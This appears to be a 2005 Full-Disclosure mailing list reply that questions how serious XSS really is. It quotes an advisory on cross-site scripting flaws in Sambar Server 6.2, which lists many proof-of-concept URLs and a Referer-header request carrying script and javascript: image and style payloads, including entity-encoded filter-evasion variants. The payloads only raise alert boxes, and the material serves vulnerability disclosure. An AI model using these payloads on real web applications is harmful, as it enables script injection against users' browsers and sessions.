Re: XSS in Sambar Server version 6.2

[Daniel <deeper () gmail com>]

"A user can input a specially crafted script that when rendered by the
application..."

Hopefully you can explain:

- Is the user required to be logged in first, or can this be done
unauthenticated
- Are you able to steal any aspect of the session management logic
using this method
- Are you able to, in any way, gain access to the sambar installation
using this technique?

I have issues with any XSS security research being more than a low
risk, unless you can modify the logic of the application or gain
access to the platform in question.
Automated scanning tools love XSS issues as they are easy to find, but
in reality bloody hard to exploit (wow, i have made a jscript window
popup)

ps, its not a personal attack, just me failing to understand the logic
of XSS attacks (hell its like 1999 when responding to ICMP packets was
seen as a risk)







On 5/23/05, jamie fisher <contact_jamie_fisher () yahoo co uk> wrote:
>                      - Sambar - 
> AFFECTED PRODUCTS:
> ================== 
> Sambar Server 6.2 
> http://www.sambar.com/ 
>
> OVERVIEW: 
> ========= 
> Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC,
> Syslog, Proxy and FTP server. 
>
> HISTORY:
> ======== 
> 17th April 2005 - First discovered
> 17th April 2005 - Contacted vendor
> 20th April 2005 - Vendor reply
> 20th May 2005 - Patch available 
>
> DETAILS:
> ======== 
> Multiple XSS found in the administrative interface. 
> In some instances Sambar Server version 6.2 does not correctly filter HTML
> code from user-supplied 
> input. A user can input a specially crafted script that when rendered by the
> application, will cause arbitrary scripting to be executed by the user's
> browser. The code will originate from the site running the Sambar Server
> version 6.2 software and will run in the security context of that site. 
>
> ISSUE:
> ====== 
> Crafted input of causes the application to output what is known as a Cross
> Site Script.  The script is rendered upon visitation to the affected the
> page served by the application. 
> EXAMPLE:
> ======== 
> Standard XSS within the /search directory:
> ========================================== 
> 1.
> http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
> 2.
> http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
> 3.
> http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
> 4.
> http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
> 5.
> http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
> 6.
> http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
> 7.
> http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
> 8.
> http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
> 9.
> http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
> 10.
> http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
> 11.
> http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
> 12.
> http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
> Standard XSS within the /session directory:
> =========================================== 
> 1.
> http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
> 2.
> http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
> 3.
> http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
> HTML XSS within the /search directory:
> ====================================== 
> 1.
> http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
> 2.
> http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
> 3.
> http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
> 4.
> http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
> %26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
> 5.
> http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
> 6.
> http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
> No chevron '<' '>' XSS within the /search directory:
> ==================================================== 
> 1.
> http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
> 2.
> http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
> 3.
> http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
> 4.
> http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
> 5.
> http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
> 6.
> http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name
> Escaping from HTML XSS within the /session directory:
> ==================================================== 
> 1.
> http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
> Including XSS within referrer:
> ============================== 
> 1.
> GET /CheckingXssInReferer.html HTTP/1.0
> Cookie:
> RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=;
> RCslb=5; RCrelogin=false
> Host: 192.168.0.5
> Accept: */*
> Accept-Language: en-us
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
> Referer: "></a><script>alert('XSS')</script> 
>
> SOLUTION: 
> ========= 
> Sambar Server has been contacted and has released patches. 
> Note: There were probably a lot more input validation errors but due to a
> whinning girlfriend work had to be cut short :) 
>
> REFERENCE:
> ========== 
> http://www.sambar.com/security.htm 
> http://homepage.hispeed.ch/spamtrap/sambar62p.exe 
>
> CREDITS: 
> ======== 
> Tod Sambar for understanding the issue and resolving in a timely manner. 
>   
> This vulnerability was discovered and researched by Jamie Fisher 
> mail: contact_jamie_fisher[at]yahoo.co.uk
>
>  ________________________________
> Yahoo! Messenger NEW - crystal clear PC to PC calling worldwide with
> voicemail 
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/